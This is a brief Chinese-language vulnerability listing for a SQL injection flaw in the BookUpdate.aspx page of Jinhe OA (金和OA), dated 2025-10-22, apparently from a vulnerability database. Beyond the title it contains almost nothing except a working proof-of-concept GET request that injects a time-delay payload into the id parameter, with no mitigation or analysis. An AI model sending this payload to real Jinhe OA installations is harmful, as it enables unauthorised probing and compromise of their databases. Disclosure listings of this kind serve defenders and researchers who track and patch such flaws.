金和OA BookUpdate.aspx SQL注入漏洞

日期: 2025-10-22 | 影响软件: 金和OA | POC: 已公开

漏洞描述

金和OA BookUpdate.aspx SQL注入漏洞

PoC代码

GET /c6/Jhsoft.Web.AddressBook/BookUpdate.aspx/?id=1%27waitfor+delay%270%3A0%3A5%27-- HTTP/1.1

相关漏洞推荐